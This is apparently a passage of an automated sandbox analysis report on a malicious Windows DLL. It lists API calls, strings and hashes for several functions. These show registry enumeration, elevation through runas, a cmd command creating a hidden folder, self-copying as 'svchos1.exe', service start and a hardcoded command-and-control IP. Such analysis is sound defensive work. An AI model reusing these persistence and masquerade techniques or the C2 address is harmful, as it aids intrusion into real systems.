                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00020000), ref: 1001FB59
                                                          • OpenServiceA.ADVAPI32(00000000,1011EC82,00000010), ref: 1001FB6D
                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 1001FB82
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FB8F
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FB92
                                                          • ExitProcess.KERNEL32 ref: 1001FB9A
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FBA0
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 1001FBA3
                                                          • ExitProcess.KERNEL32 ref: 1001FC3A
                                                          • sprintf.MSVCRT ref: 1001FC05
                                                            • Part of subcall function 1001E440: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000,1011EF78,00000000,0000005C), ref: 1001E484
                                                            • Part of subcall function 1001E440: GetLocalTime.KERNEL32(?), ref: 1001E4CE
                                                            • Part of subcall function 1001E440: sprintf.MSVCRT ref: 1001E599
                                                          • Sleep.KERNEL32(00000032), ref: 1001FBAD
                                                            • Part of subcall function 1001EF90: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,771B0F00,1001FEC4), ref: 1001EFAF
                                                            • Part of subcall function 1001EF90: CloseHandle.KERNEL32(00000000,?,?,?,?,?,771B0F00,1001FEC4,?,?,?,?,?,?,?,?), ref: 1001EFB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$HandleService$Close$CreateDescriptorExitOpenProcessSecuritySleepThreadsprintf$#823AddressCommandCurrentDaclErrorFileInitializeLastLibraryLineLoadLocalManagerMessageModuleMutexObjectPostProcSingleStartTimeWaitstrstr
                                                          • String ID: -acsi$%$%$%$%$%$%$.$.$1.0$2$2$2$2$27.124.13.32$3$3$A$A$A$A$A$A$A$A$A$A$A$A$A$A$C$C$D$D$D$D$Default$E$E$E$E$F$F$F$F$G$G$G$G$Global\$I$I$K$L$L$M$M$N$P$P$R$S$S$S$S$S$S$S$S$T$V$a$a$a$a$a$a$a$a$a$b$b$c$c$c$c$c$d$d$d$g$g$g$g$g$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$n$n$n$o$o$o$open$p$p$p$p$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$v$v$v$x$y
                                                          • API String ID: 351596864-2051936253
                                                          • Opcode ID: 396c311c59b219a6e9856af48bca6b6f49ef19d76da5838c064707eedaeea6b0
                                                          • Instruction ID: 03ba51a34e947f1e7150f2c6594a6cea4c9bea9df2946d370c6041ae97ececec
                                                          • Opcode Fuzzy Hash: 396c311c59b219a6e9856af48bca6b6f49ef19d76da5838c064707eedaeea6b0
                                                          • Instruction Fuzzy Hash: DA82057050C3C0DDE332C7688848BDFBED5ABA6708F48499DE5CC4A292D7BA5648C767
                                                          Function 10014700 Relevance: 63.4, APIs: 23, Strings: 13, Instructions: 428libraryregistryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 91 10014700-1001487f LoadLibraryA GetProcAddress #823 * 2 RegOpenKeyExA 92 10014881-10014894 call 10014c12 91->92 93 10014899-1001489f 91->93 119 10014c28-10014c53 #825 * 2 92->119 95 100148a5 93->95 96 100149ab-100149b7 call 10014c12 93->96 95->96 99 10014a03-10014a29 RegQueryValueExA 95->99 100 100148c2-100148ec RegQueryValueExA 95->100 101 10014ba2-10014bcd wsprintfA 95->101 102 100149a4 95->102 103 10014908-10014932 RegQueryValueExA 95->103 104 100148ac-100148b5 95->104 105 10014acc-10014b3e RegEnumValueA 95->105 106 10014bcf-10014bd4 95->106 107 10014a30-10014a72 RegEnumKeyExA 95->107 108 10014bf5-10014c0d lstrcatA 95->108 109 10014bd6 95->109 110 10014b58-10014b7b wsprintfA 95->110 111 10014b7d-10014ba0 wsprintfA 95->111 112 100149bc-100149e6 RegQueryValueExA 95->112 96->119 99->96 115 10014a2b 99->115 100->96 121 100148f2-10014906 call 10010c70 100->121 101->108 102->96 103->96 122 10014934-10014943 103->122 104->96 120 100148bb 104->120 105->96 117 10014b44-10014b4b 105->117 118 10014bdb-10014bf2 wsprintfA 106->118 107->96 116 10014a78-10014ac7 wsprintfA 107->116 109->118 110->108 111->108 112->96 114 100149e8-10014a01 wsprintfA 112->114 114->102 115->102 116->107 117->108 124 10014b51 117->124 118->108 120->96 120->99 120->100 120->101 120->103 120->106 120->108 120->109 120->110 120->111 120->112 129 10014986-100149a2 121->129 125 10014949-1001494c 122->125 124->101 124->106 124->108 124->109 124->110 124->111 126 10014980 125->126 127 1001494e-1001497e strncat * 2 strchr 125->127 126->129 127->125 129->102
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                          • #823.MFC42(?), ref: 10014763
                                                          • #823.MFC42(?,?), ref: 100147DA
                                                          • RegOpenKeyExA.KERNELBASE(00000000,1011EF78,00000000,00020019,?), ref: 1001487A
                                                            • Part of subcall function 10014C12: RegCloseKey.ADVAPI32(00000000,100149B7), ref: 10014C1C
                                                            • Part of subcall function 10014C12: RegCloseKey.ADVAPI32(?), ref: 10014C25
                                                          • #825.MFC42(?), ref: 10014C2F
                                                          • #825.MFC42(?,?), ref: 10014C38
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823#825Close$AddressLibraryLoadOpenProc
                                                          • String ID: %-24s %-$%-24s %-15$'%','-','2','4','s',' ','%','-','1','5','s',' ','0','x','%','x','(','%','d',')',' ','','r','','n','$15s $ADVAPI32.dll$REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$RegOpenKeyExA$[%s]$s %s
                                                          • API String ID: 625772149-2764046103
                                                          • Opcode ID: aee2fbfb53f9212be97810f834c78ac85ceb427a47ea468a14eb8ed47b1d2988
                                                          • Instruction ID: b9ee80f7ba0032ef2a873998b74759f7f259eced15a3b8225111e03f3ed8f019
                                                          • Opcode Fuzzy Hash: aee2fbfb53f9212be97810f834c78ac85ceb427a47ea468a14eb8ed47b1d2988
                                                          • Instruction Fuzzy Hash: 63E1A0B29005189BDB14CFA8CC84AEFB7B9FB88310F554359F61AA72D0DB759E44CB90
                                                          Function 10021410 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 126sleepprocessthreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • _access.MSVCRT ref: 1002141D
                                                            • Part of subcall function 100209D0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10020A10
                                                            • Part of subcall function 100209D0: CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 10020A25
                                                            • Part of subcall function 100209D0: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10020A30
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10021449
                                                          • ShellExecuteExA.SHELL32(?), ref: 10021491
                                                          • GetLastError.KERNEL32 ref: 10021497
                                                          • exit.MSVCRT ref: 100214A1
                                                          • _access.MSVCRT ref: 100214D0
                                                          • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 100214ED
                                                          • _access.MSVCRT ref: 100214F6
                                                          • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 10021507
                                                          • Sleep.KERNEL32(000003E8), ref: 1002150E
                                                          • _access.MSVCRT ref: 10021517
                                                          • Sleep.KERNELBASE(000001F4,?,?), ref: 10021526
                                                          • CreateThread.KERNELBASE(00000000,00000000,10020FD0,00000000,00000000,00000000), ref: 10021542
                                                          • CloseHandle.KERNELBASE(00000000), ref: 1002154F
                                                          • CreateThread.KERNELBASE(00000000,00000000,100211C0,00000000,00000000,00000000), ref: 10021560
                                                          • CloseHandle.KERNEL32(00000000), ref: 10021567
                                                          • Shellex.L10U7QN0CY ref: 1002157D
                                                            • Part of subcall function 1001EFD0: #823.MFC42(00000849), ref: 1001EFDF
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(27.124.13.32,00000000), ref: 1001F006
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EAFC,0000012C), ref: 1001F014
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(Default,00000260), ref: 1001F022
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1.0,00000292), ref: 1001F030
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EC82,000002B2), ref: 1001F03E
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011ECE6,00000316), ref: 1001F04C
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011ED66,00000396), ref: 1001F05A
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EE66,00000496), ref: 1001F068
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EF78,000005A8), ref: 1001F076
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011EFDC,0000060C), ref: 1001F084
                                                            • Part of subcall function 1001EFD0: lstrcpyA.KERNEL32(1011F018,00000648), ref: 1001F092
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$_access$CloseCreateExecHandleSleepThread$#823AllocateCheckErrorExecuteFileFreeInitializeLastMembershipModuleNameShellShellexTokenexit
                                                          • String ID: 27.124.13.32$<$C:\Users\Public\Documents\MM$C:\Users\Public\Documents\MM\svchos1.exe$cmd /c md C:\Users\Public\Documents\MM$runas
                                                          • API String ID: 2771109159-2199693279
                                                          • Opcode ID: 47013249946700c5f9ea9399668bc89909b1de1377a07b2227f678a46ff069ce
                                                          • Instruction ID: cd7c039830fad82791ff8b600530d86eb936d2ebe89cd3a7d692d6b5a8a0fa87
                                                          • Opcode Fuzzy Hash: 47013249946700c5f9ea9399668bc89909b1de1377a07b2227f678a46ff069ce
                                                          • Instruction Fuzzy Hash: 1D313939640315A7F620E7B8AC81FCE3694EF947A0F540625F718FB1D0DBB4A94046A6
                                                          Function 1001AB20 Relevance: 28.1, APIs: 6, Strings: 10, Instructions: 92filestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                            • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                            • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                            • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001ABCC
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC0A
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC1A
                                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC2A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC31
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,00000000,1011EF78,00000000,00000000), ref: 1001AC38
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$#823lstrlen$AddressCloseCreateHandleLibraryLoadProcReadSize
                                                          • String ID: C:\ProgramData\Microsoft Drive\Mark.sys$M$T$TGByte\Setup$a$e$i$k$m$r
                                                          • API String ID: 1069036285-2757848780
                                                          • Opcode ID: ec809791d292be055727b466fa0ce1641dba220c236396e814923678bb28ca07
                                                          • Instruction ID: 22e6748c9a2becf40cddaea7510870619e651d703c90d80807b49c54875026d3
                                                          • Opcode Fuzzy Hash: ec809791d292be055727b466fa0ce1641dba220c236396e814923678bb28ca07
                                                          • Instruction Fuzzy Hash: 1B31B831108790AFE311CB28CC54B9BBBD9EBC9704F444A1CFA99573D1D7B66A04CB66
                                                          Function 100214B0 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 75sleepprocessthreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 10021410: _access.MSVCRT ref: 1002141D
                                                          • _access.MSVCRT ref: 100214D0
                                                          • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 100214ED
                                                          • _access.MSVCRT ref: 100214F6
                                                          • WinExec.KERNEL32(cmd /c md C:\Users\Public\Documents\MM,00000000), ref: 10021507
                                                          • Sleep.KERNEL32(000003E8), ref: 1002150E
                                                          • _access.MSVCRT ref: 10021517
                                                          • Sleep.KERNELBASE(000001F4,?,?), ref: 10021526
                                                          • CreateThread.KERNELBASE(00000000,00000000,10020FD0,00000000,00000000,00000000), ref: 10021542
                                                          • CloseHandle.KERNELBASE(00000000), ref: 1002154F
                                                          • CreateThread.KERNELBASE(00000000,00000000,100211C0,00000000,00000000,00000000), ref: 10021560
                                                          • CloseHandle.KERNEL32(00000000), ref: 10021567
                                                          • Shellex.L10U7QN0CY ref: 1002157D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _access$CloseCreateExecHandleSleepThread$Shellex
                                                          • String ID: 27.124.13.32$C:\Users\Public\Documents\MM$cmd /c md C:\Users\Public\Documents\MM
                                                          • API String ID: 4276510029-3007588180
                                                          • Opcode ID: d1bb37949f93bbbdf33aeda2a2054d21fcfc61b33a9e68333bfe54f2a22e07a3
                                                          • Instruction ID: 3e7a1a4e7598c83f093a5e0993a406ee5a5388e5c4ebba12b8a80e490745e328
                                                          • Opcode Fuzzy Hash: d1bb37949f93bbbdf33aeda2a2054d21fcfc61b33a9e68333bfe54f2a22e07a3
                                                          • Instruction Fuzzy Hash: D611CD39780725B2F520E3B46C82FDE2544DB907A0F650672F719BF1C0DAA4BC4046AA
                                                          Function 1002BDB0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 54libraryloaderthreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,1011EF78,771B0F00,0000005C,00000000,00000000,771B0F00,1001FEC4), ref: 1002BDDE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002BDE7
                                                          • CreateThread.KERNELBASE(?,?,1002BCB0,?,?,?), ref: 1002BE15
                                                          • LoadLibraryA.KERNEL32(KERNEL32.DLL,WaitForSingleObject,?,?,?,?,?,?,?,?,?), ref: 1002BE27
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002BE2A
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 1002BE3A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$CloseCreateHandleThread
                                                          • String ID: CreateEventA$KERNEL32.DLL$KERNEL32.dll$WaitForSingleObject
                                                          • API String ID: 2992130774-1666596002
                                                          • Opcode ID: 66dcb28fd48408753ecbc63a31bf9652f99330e46bd155989c14c10afc364313
                                                          • Instruction ID: 87cc892ea1759eb00eaf64f8c46fa55303ed71919323dfed3064715f6316d5fa
                                                          • Opcode Fuzzy Hash: 66dcb28fd48408753ecbc63a31bf9652f99330e46bd155989c14c10afc364313
                                                          • Instruction Fuzzy Hash: 70110C75608315AFD600DFA88C84F9BBBE8EBC8350F544A0DF698D3251C674E9058BA2
                                                          Function 10020F70 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 28COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 10020F30: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10020F42
                                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D49A3D8,1011FA70,?,?,1002152D), ref: 10020F8C
                                                          • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,?,?,1002152D), ref: 10020F93
                                                          • GetLastError.KERNEL32(?,?,1002152D), ref: 10020F9F
                                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D49A3D8,1011FA58,00000000,?,?,1002152D), ref: 10020FB2
                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP60(?,?,?,?,1002152D), ref: 10020FBD
                                                          • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,?,?,?,?,1002152D), ref: 10020FC4
                                                          Strings
                                                          • C:\Users\Public\Documents\MM\svchos1.exe, xrefs: 10020F70
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: U?$char_traits@$V?$basic_ostream@$??6std@@?endl@std@@D@std@@@0@D@std@@@1@V10@V21@@$??6?$basic_ostream@D@std@@@std@@ErrorFileLastModuleNameV01@
                                                          • String ID: C:\Users\Public\Documents\MM\svchos1.exe
                                                          • API String ID: 481592904-2345221083
                                                          • Opcode ID: f77c0b55697f030eaac147686a7c31d4908e0b1848482c375ca60604acc84bd7
                                                          • Instruction ID: ff15b68b2db02ee6112a923f0d9d03375cbf9b0eaed6c4210ff095593cf92b5b
                                                          • Opcode Fuzzy Hash: f77c0b55697f030eaac147686a7c31d4908e0b1848482c375ca60604acc84bd7
                                                          • Instruction Fuzzy Hash: 71E065B8A103106BE745A7F4AC8D99A37D8FF4450670C1A78FD0EE6161EF39D2549711
                                                          Function 10020F30 Relevance: 3.0, APIs: 2, Instructions: 18fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 184 10020f30-10020f4a GetModuleFileNameA 185 10020f53-10020f6e CopyFileA 184->185 186 10020f4c-10020f52 184->186
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 10020F42
                                                          • CopyFileA.KERNEL32(00000000,?,00000000), ref: 10020F62
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CopyModuleName
                                                          • String ID:
                                                          • API String ID: 4108865673-0
                                                          • Opcode ID: 8b9eeeda643a368c08ce189f1b931563e6753a19753fcbcbb6e14da0ee54dd1c
                                                          • Instruction ID: 93f4a3cd88c2ae214515ddcb3b57ab60d0dfeb708720a14bb37e431ebb366a02
                                                          • Opcode Fuzzy Hash: 8b9eeeda643a368c08ce189f1b931563e6753a19753fcbcbb6e14da0ee54dd1c
                                                          • Instruction Fuzzy Hash: BCE012F95443006BF314DB58DCC6FE636A8BB80B00FC44918F79C851D0E6F59598C662
                                                          Function 10014C12 Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
